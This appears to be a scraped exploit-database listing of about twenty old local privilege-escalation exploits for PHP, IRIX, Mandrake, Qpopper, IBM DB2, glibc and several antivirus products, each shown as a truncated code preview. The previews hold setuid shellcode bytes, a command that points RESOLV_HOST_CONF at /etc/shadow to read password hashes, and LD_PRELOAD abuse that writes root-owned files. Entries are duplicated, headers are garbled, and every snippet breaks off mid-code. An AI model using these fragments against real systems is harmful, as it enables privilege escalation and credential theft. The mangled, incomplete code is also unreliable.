PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || // // | |/ || '|/ |/ -| ' / -/ |||| /| || / //...

PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...

PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / //...

PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit

Exploit for linux platform in category local exploits ===================================================================== PHP = 4.4.6 / 5.2.1 arrayuserkeycompare ZVAL dtor Local Exploit ===================================================================== ?php...

KLA10122 SB vulnerability in Comodo Firewall Pro

An unspecified vulnerability was found in Comodo Firewall Pro. By exploiting this vulnerability malicious users can bypass the driver protection for registry keys. This vulnerability can be exploited locally at a point related to OLE NamedPipe. Original advisories - Related products...

Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit

Exploit for plan9 platform in category local exploits ==================================================== Plan 9 Kernel devenv.c OTRUNC/pwrite Local Exploit ==================================================== / !!! DO NOT DISTRIBUTE !!! / / identity theft this exploit uses my devenv.c...

McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit

Exploit for macOS platform in category local exploits ========================================================== McAfee VirusScan for Mac Virex \n\nTargets:\n\n"; foreach $key sortkeys %tgts $a,$b = split/:/,$tgts"$key"; print "\t$key . $a\n"; print "\n"; exit 1; $a,$b = split/:/,$tgts"$target";...

CVE-2007-0670

CVE-2007-0670 affects IBM AIX 5.2 and 5.3, where a buffer overflow in bos.rte.libc can be triggered by the r-commands (rdist, rsh, rcp, rsync, rlogin) to allow local users to execute arbitrary code. Root cause: insufficient bounds checking in bos.rte.libc. Impact: local code execution with partia...

Trend Micro VirusWall 3.81 - &#039;vscan/VSAPI&#039; Local Buffer Overflow

/ Title: Local root exploit for vscan/VSAPI =Trend Micro VirusWall 3.81 on Linux Author: Sebastian Wolfgarten / [email protected] / http://www.devtarget.org Date: January 3rd, 2007 Severity: Medium Description: The product "InterScan VirusWall 3.81 for Linux" ships a library called...

Microsoft Visual C++ - &#039;.RC Resource Files&#039; Local Buffer Overflow

// // // Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow // vulnerability .rc resource files exploit // // vulnerability found / exploit built by porkythepig // // include "stdio.h" include "stdlib.h" include "memory.h" define STR01 "Microsoft Visual Studio 6.0 SP6 .rc PoC exploit ...

PT-2006-6799 · Freebsd · Ld.So

Name of the Vulnerable Software and Affected Versions: ld.so in FreeBSD, NetBSD, and possibly other BSD distributions affected versions not specified Description: The issue allows local users to gain privileges by passing certain environment variables to loading processes, as ld.so does not remov...

Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit

Exploit for unknown platform in category local exploits =============================================================== Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit =============================================================== //////////////////////////////////// ///// AVP...

Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit

No description provided by source. setenv RESOLVHOSTCONF /etc/shadow; ping adfas...

Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

No description provided by source. !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x8...

MS Windows Improper Token Validation Local Exploit (working)

No description provided by source. / Removed include "stdafx.h" / str0ke / include stdio.h include windows.h define INFOBUFFERSIZE MAXCOMPUTERNAMELENGTH + 1 define PATHSIZE INFOBUFFERSIZE + MAXPATH + 4 typedef UINT WINAPI PFnMsiInstallProductLPCSTR szPackagePath, LPCSTR szCommandLine; int mainint...

Qpopper 4.0.x poppassd Local Root Exploit

No description provided by source. / Title: Qpopper v4.0.x poppassd local root exploit. Exploit code: 0x82-Local.Qp0ppa55d.c -- ./0x82-Local.Qp0ppa55d -u x82 -p mypasswd Qpopper v4.0.x poppassd local root exploit. by Xpl017Elz / include stdio.h include stdlib.h include unistd.h include sys/stat.h...

IBM DB2 Universal Database 7.2 (db2licm) Local Exploit

No description provided by source. / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu / char sc= "\x31\xc0" / begin setuid 0 / "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07"...

IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit

No description provided by source. !/bin/sh copyright LAST STAGE OF DELIRIUM jul 2000 poland ://lsd-pl.net/ /usr/lib/print/netprint This code gets released due to another post to the Bugtraq mailing list. For IRIX 6.3 and above this privilage escalation attack can be conducted by local lp users...

IRIX /bin/login Local Buffer Overflow Exploit

No description provided by source. / /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include stdio.h...

GLIBC 2.1.3 ld_preload Local Exploit

No description provided by source. !/bin/tcsh przyklad wykorzystania dziury w LDPRELOAD shadow tested on redhat 6.0, should work on others if -e /etc/initscript echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LDPRELOAD libSegFault.so setenv SEGFAULTOUTPUTNAME /etc/initscript echo...